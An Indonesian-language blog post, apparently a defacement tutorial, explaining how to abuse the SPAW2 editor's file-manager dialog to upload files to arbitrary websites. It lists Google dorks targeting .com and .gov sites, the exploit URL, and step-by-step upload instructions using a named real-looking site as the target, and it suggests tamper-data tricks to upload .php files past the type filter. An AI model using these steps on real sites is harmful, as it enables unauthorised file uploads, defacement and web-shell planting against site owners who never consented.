Di exploit ini kita cuman diperbolehkan nitip file dengan format:
.txt dan .html
so kalian juga bisa mencoba dengan method tamper data / yang lain jika ingin mengupload file .php
gw juga blom nyoba sih ke bbrapa site..
sjauh ini yg gw temuin mesti kena notif "Error: files of this type are not allowed."
Skarang lngsung ke caranya ja ya, ikutin langkah-langkahnya:
Dork :
- inurl:/spaw2/uploads/files/ site:.com
- inurl:/spaw2/uploads/files/ site:.gov
- Bisa di kembangin sndiri ya :)
Exploit :
site,com/path/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file
Langkah -Langkah :
- Masukin dork tadi di gugel, pilih site terserahlu..
- di url site target ganti jadi seperti ini:
Sebelumnya
www.wholehealthamerica.com/spaw2/uploads/files/
Sesudah
http://www.wholehealthamerica.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file- Ganti "Flash Movies" ke "Files", file type pilih All files (*.*).
- Sekarang Klik "Browse", pilih file mu. Jika sudah klik Upload
- Hasil file upload akan terUpload di site,com/path/spaw2/uploads/files/
- Jadi lngsung aja panggil file mu tadi dengan mengetikkan seperti ini:
http://www.wholehealthamerica.com/spaw2/uploads/files/ecf.txt- Dah gitu aja gmpang kan :)
Semoga bermanfaat.
No comments:
Post a Comment